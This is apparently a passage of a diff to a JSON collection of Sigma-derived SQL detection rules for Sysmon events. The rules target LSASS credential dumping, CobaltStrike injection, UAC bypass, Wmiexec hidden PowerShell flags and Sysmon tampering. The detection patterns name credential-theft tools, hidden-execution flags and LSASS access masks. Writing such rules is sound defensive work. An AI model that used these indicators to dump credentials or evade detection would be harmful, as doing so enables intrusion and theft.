"attack.t1564.004" ], "falsepositives": [ - "Legitimate use of the UI Accessibility Checker" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\AccCheckConsole.exe' ESCAPE '\\' OR OriginalFileName = 'AccCheckConsole.exe') AND (CommandLine LIKE '% -window %' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Contents REGEXP 'http[s]?://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}' AND (TargetFilename LIKE '%.ps1:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.bat:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.exe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbs:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.one:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cmd:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.hta:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk:Zone%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_susp_acccheckconsole.yml" + "filename": "create_stream_hash_susp_ip_domains.yml" }, { - "title": "HackTool - Wmiexec Default Powershell Command", - "id": "022eaba8-f0bf-4dd9-9217-4604b0bb3bb0", + "title": "HandleKatz Duplicating LSASS Handle", + "id": "b1bd3a59-c1fd-4860-9f40-4dd161a7d1f5", "status": "experimental", - "description": "Detects the execution of PowerShell with a specific flag sequence that is used by the Wmiexec script", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects HandleKatz opening LSASS to duplicate its handle to later dump the memory without opening any new handles", + "author": "Bhabesh Raj (rule), @thefLinkk", "tags": [ + "attack.execution", + "attack.t1106", "attack.defense_evasion", - "attack.lateral_movement" + "attack.t1003.001" ], 
"falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess = '0x1440' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%)' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_wmiexec_default_powershell.yml" + "filename": "proc_access_win_handlekatz_lsass_access.yml" }, { - "title": "Suspicious PowerShell Parent Process", - "id": "754ed792-634f-40ae-b3bc-e0448d33f695", - "status": "test", - "description": "Detects a suspicious or uncommon parent processes of PowerShell", - "author": "Teymur Kheirkhabarov, Harish Segar", + "title": "Direct Syscall of NtOpenProcess", + "id": "3f3f3506-1895-401b-9cc3-e86b16e630d0", + "status": "experimental", + "description": "Detects the usage of the direct syscall of NtOpenProcess which might be done from a CobaltStrike BOF.", + "author": "Christian Burkard (Nextron Systems), Tim Shelton", "tags": [ "attack.execution", - "attack.t1059.001" + "attack.t1106" ], "falsepositives": [ - "Other scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%tomcat%' ESCAPE '\\' OR (ParentImage LIKE '%\\\\amigo.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\browser.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\chrome.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\firefox.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\jbosssvc.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR 
ParentImage LIKE '%\\\\microsoftedgecp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MicrosoftEdgeSH.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\outlook.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\safari.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\sqlagent.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\sqlserver.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\sqlservr.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\')) AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR (CommandLine LIKE '%/c powershell%' ESCAPE '\\' OR CommandLine LIKE '%/c pwsh%' ESCAPE '\\') OR Description = 'Windows PowerShell' OR Product = 'PowerShell Core 6' OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CallTrace LIKE 'UNKNOWN%' ESCAPE '\\' AND NOT ((TargetImage LIKE 'C:\\\\Program Files\\\\Cylance\\\\Desktop\\\\CylanceUI.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\Explorer.EXE' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\') OR (TargetImage LIKE '%vcredist\\_x64.exe' ESCAPE '\\' AND SourceImage LIKE '%vcredist\\_x64.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Windows\\\\system32\\\\systeminfo.exe' ESCAPE '\\' AND SourceImage LIKE '%setup64.exe' ESCAPE '\\') OR (TargetImage LIKE '%AmazonSSMAgentSetup.exe' ESCAPE '\\' AND SourceImage LIKE 
'%AmazonSSMAgentSetup.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\') OR (TargetImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe' ESCAPE '\\') OR (TargetImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files (x86)\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Program Files (x86)\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\Discord\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\Discord.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\AUDIODG.EXE' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\app-%' ESCAPE '\\' AND SourceImage LIKE '%\\\\Yammer.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE 
'%\\\\AppData\\\\Local\\\\yammerdesktop\\\\app-%' ESCAPE '\\' AND TargetImage LIKE '%\\\\Yammer.exe' ESCAPE '\\' AND GrantedAccess = '0x1000') OR (Provider_Name = 'Microsoft-Windows-Kernel-Audit-API-Calls') OR (TargetImage LIKE '%\\\\Evernote\\\\Evernote.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_susp_parent_process.yml" + "filename": "proc_access_win_direct_syscall_ntopenprocess.yml" }, { - "title": "Disabled Volume Snapshots", - "id": "dee4af55-1f22-4e1d-a9d2-4bdc7ecb472a", + "title": "UAC Bypass Using WOW64 Logger DLL Hijack", + "id": "4f6c43e2-f989-4ea5-bcd8-843b49a0317c", "status": "test", - "description": "Detects commands that temporarily turn off Volume Snapshots", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the pattern of UAC Bypass using a WoW64 logger DLL hijack (UACMe 30)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Legitimate administration" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Services\\\\VSS\\\\Diag%' ESCAPE '\\' AND CommandLine LIKE '%/d Disabled%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND SourceImage LIKE '%:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' AND GrantedAccess = '0x1fffff' AND CallTrace LIKE 'UNKNOWN(0000000000000000)|UNKNOWN(0000000000000000)|%' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_volsnap_disable.yml" + "filename": "proc_access_win_uac_bypass_wow64_logger.yml" }, { - "title": "Suspicious Manipulation Of Default Accounts Via Net.EXE", - "id": "5b768e71-86f2-4879-b448-81061cbae951", - "status": "experimental", - "description": "Detects suspicious 
manipulations of default accounts such as 'administrator' and 'guest'. For example 'enable' or 'disable' accounts or change the password...etc", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "CobaltStrike BOF Injection Pattern", + "id": "09706624-b7f6-455d-9d02-adee024cee1d", + "status": "test", + "description": "Detects a typical pattern of a CobaltStrike BOF which inject into other processes", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.execution", + "attack.t1106", + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Some false positives could occur with the admin or guest account. It depends on the scripts being used by the admins in your env. If you experience a lot of FP you could reduce the level to medium" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND CommandLine LIKE '% user %' ESCAPE '\\' AND (CommandLine LIKE '% Järjestelmänvalvoja %' ESCAPE '\\' OR CommandLine LIKE '% Rendszergazda %' ESCAPE '\\' OR CommandLine LIKE '% Администратор %' ESCAPE '\\' OR CommandLine LIKE '% Administrateur %' ESCAPE '\\' OR CommandLine LIKE '% Administrador %' ESCAPE '\\' OR CommandLine LIKE '% Administratör %' ESCAPE '\\' OR CommandLine LIKE '% Administrator %' ESCAPE '\\' OR CommandLine LIKE '% guest %' ESCAPE '\\' OR CommandLine LIKE '% DefaultAccount %' ESCAPE '\\' OR CommandLine LIKE '% \"Järjestelmänvalvoja\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Rendszergazda\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Администратор\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrateur\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrador\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administratör\" %' ESCAPE '\\' OR CommandLine LIKE '% 
\"Administrator\" %' ESCAPE '\\' OR CommandLine LIKE '% \"guest\" %' ESCAPE '\\' OR CommandLine LIKE '% \"DefaultAccount\" %' ESCAPE '\\' OR CommandLine LIKE '% ''Järjestelmänvalvoja'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Rendszergazda'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Администратор'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrateur'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrador'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administratör'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrator'' %' ESCAPE '\\' OR CommandLine LIKE '% ''guest'' %' ESCAPE '\\' OR CommandLine LIKE '% ''DefaultAccount'' %' ESCAPE '\\')) AND NOT (CommandLine LIKE '%guest%' ESCAPE '\\' AND CommandLine LIKE '%/active no%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CallTrace REGEXP '^C:\\\\Windows\\\\SYSTEM32\\\\ntdll\\.dll\\+[a-z0-9]{4,6}\\|C:\\\\Windows\\\\System32\\\\KERNELBASE\\.dll\\+[a-z0-9]{4,6}\\|UNKNOWN\\([A-Z0-9]{16}\\)$' AND GrantedAccess IN ('0x1028', '0x1fffff'))" ], - "filename": "proc_creation_win_net_default_accounts_manipulation.yml" + "filename": "proc_access_win_cobaltstrike_bof_injection_pattern.yml" }, { - "title": "Base64 MZ Header In CommandLine", - "id": "22e58743-4ac8-4a9f-bf19-00a0428d8c5f", - "status": "experimental", - "description": "Detects encoded base64 MZ header in the commandline", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Load Undocumented Autoelevated COM Interface", + "id": "fb3722e4-1a06-46b6-b772-253e2e7db933", + "status": "test", + "description": "COM interface (EditionUpgradeManager) that is not used by standard executables.", + "author": "oscd.community, Dmitry Uchakin", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%TVqQAAMAAAAEAAAA%' ESCAPE '\\' OR CommandLine LIKE '%TVpQAAIAAAAEAA8A%' ESCAPE '\\' OR CommandLine LIKE '%TVqAAAEAAAAEABAA%' ESCAPE '\\' OR CommandLine LIKE '%TVoAAAAAAAAAAAAA%' ESCAPE '\\' OR CommandLine LIKE '%TVpTAQEAAAAEAAAA%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CallTrace LIKE '%editionupgrademanagerobj.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_inline_base64_mz_header.yml" + "filename": "proc_access_win_load_undocumented_autoelevated_com_interface.yml" }, { - "title": "Console CodePage Lookup Via CHCP", - "id": "7090adee-82e2-4269-bd59-80691e7c6338", - "status": "experimental", - "description": "Detects use of chcp to look up the system locale value as part of host discovery", - "author": "_pete_0, TheDFIRReport", + "title": "Credential Dumping by Pypykatz", + "id": "7186e989-4ed7-4f4e-a656-4674b9e3e48b", + "status": "test", + "description": "Detects LSASS process access by pypykatz for credential dumping.", + "author": "Bhabesh Raj", "tags": [ - "attack.discovery", - "attack.t1614.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "During Anaconda update the 'conda.exe' process will eventually execution the 'chcp' command." 
+ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '% /c %' ESCAPE '\\' OR ParentCommandLine LIKE '% /r %' ESCAPE '\\' OR ParentCommandLine LIKE '% /k %' ESCAPE '\\') AND Image LIKE '%\\\\chcp.com' ESCAPE '\\' AND (CommandLine LIKE '%chcp' ESCAPE '\\' OR CommandLine LIKE '%chcp ' ESCAPE '\\' OR CommandLine LIKE '%chcp ' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+%' ESCAPE '\\' AND CallTrace LIKE '%libffi-7.dll%' ESCAPE '\\' AND CallTrace LIKE '%\\_ctypes.pyd+%' ESCAPE '\\' AND CallTrace LIKE '%python3%.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" ], - "filename": "proc_creation_win_chcp_codepage_lookup.yml" + "filename": "proc_access_win_pypykatz_cred_dump_lsass_access.yml" }, { - "title": "HackTool - SharpImpersonation Execution", - "id": "f89b08d0-77ad-4728-817b-9b16c5a69c7a", - "status": "experimental", - "description": "Detects execution of the SharpImpersonation tool. 
Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively", - "author": "Sai Prashanth Pulisetti @pulisettis, Nasreddine Bencherchali (Nextron Systems)", + "title": "LSASS Memory Access by Tool Named Dump", + "id": "9bd012ee-0dff-44d7-84a0-aa698cfd87a3", + "status": "test", + "description": "Detects a possible process memory dump based on a keyword in the file name of the accessing process", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1134.001", - "attack.t1134.003" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Unknown" + "Rare programs that contain the word dump in their name and access lsass" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpImpersonation.exe' ESCAPE '\\' OR OriginalFileName = 'SharpImpersonation.exe' OR (CommandLine LIKE '% user:%' ESCAPE '\\' AND CommandLine LIKE '% binary:%' ESCAPE '\\') OR (CommandLine LIKE '% user:%' ESCAPE '\\' AND CommandLine LIKE '% shellcode:%' ESCAPE '\\') OR (CommandLine LIKE '% technique:CreateProcessAsUserW%' ESCAPE '\\' OR CommandLine LIKE '% technique:ImpersonateLoggedOnuser%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE '%dump%' ESCAPE '\\' AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE 
'%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_sharp_impersonation.yml" + "filename": "proc_access_win_lsass_memdump_indicators.yml" }, { - "title": "Suspicious Rundll32 Activity Invoking Sys File", - "id": "731231b9-0b5d-4219-94dd-abb6959aa7ea", - "status": "test", - "description": "Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452", + "title": "SysmonEnte Usage", + "id": "d29ada0f-af45-4f27-8f32-f7b77c3dbc4e", + "status": "experimental", + "description": "Detects the use of SysmonEnte, a tool to attack the integrity of Sysmon", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218.011" + "attack.t1562.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND (CommandLine LIKE '%.sys,%' ESCAPE '\\' OR CommandLine LIKE '%.sys %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((TargetImage LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' AND GrantedAccess = '0x1400') AND NOT (((SourceImage LIKE 'C:\\\\Program Files%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\')) OR (SourceImage LIKE 
'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\'))) OR CallTrace = 'Ente'))" ], - "filename": "proc_creation_win_rundll32_sys.yml" + "filename": "proc_access_win_hack_sysmonente.yml" }, { - "title": "TA505 Dropper Load Pattern", - "id": "18cf6cf0-39b0-4c22-9593-e244bdc9a2d4", + "title": "Malware Shellcode in Verclsid Target Process", + "id": "b7967e22-3d7e-409b-9ed5-cdae3f9243a1", "status": "test", - "description": "Detects mshta loaded by wmiprvse as parent as used by TA505 malicious documents", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro", + "author": "John Lambert (tech), Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.g0092", - "attack.t1106" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' AND (Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'mshta.exe'))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\verclsid.exe' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF') AND ((CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%VBE7.DLL%' ESCAPE '\\') OR (SourceImage LIKE '%\\\\Microsoft Office\\\\%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_ta505_dropper.yml" + "filename": "proc_access_win_malware_verclsid_shellcode.yml" }, { - "title": "Renamed Whoami Execution", - "id": "f1086bf7-a0c4-4a37-9102-01e573caf4a0", - "status": "test", - "description": "Detects the execution of whoami that has been renamed to a 
different name to avoid detection", + "title": "Suspicious GrantedAccess Flags on LSASS Access", + "id": "a18dd26b-6450-46de-8c91-9659150cf088", + "status": "experimental", + "description": "Detects process access to LSASS memory with suspicious access flags", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Unknown" + "Legitimate software such as AV and EDR" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'whoami.exe' AND NOT (Image LIKE '%\\\\whoami.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\')) AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program 
Files\\\\Malwarebytes\\\\Anti-Malware\\\\MBAMService.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Users\\\\%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\System32\\\\perfmon.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\MRT.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Cisco\\\\Cisco AnyConnect Secure Mobility Client\\\\vpnagent.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Cisco\\\\Cisco AnyConnect Secure Mobility Client\\\\vpnagent.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (CallTrace LIKE '%|C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\{%' ESCAPE '\\' AND CallTrace LIKE '%}\\\\mpengine.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Security 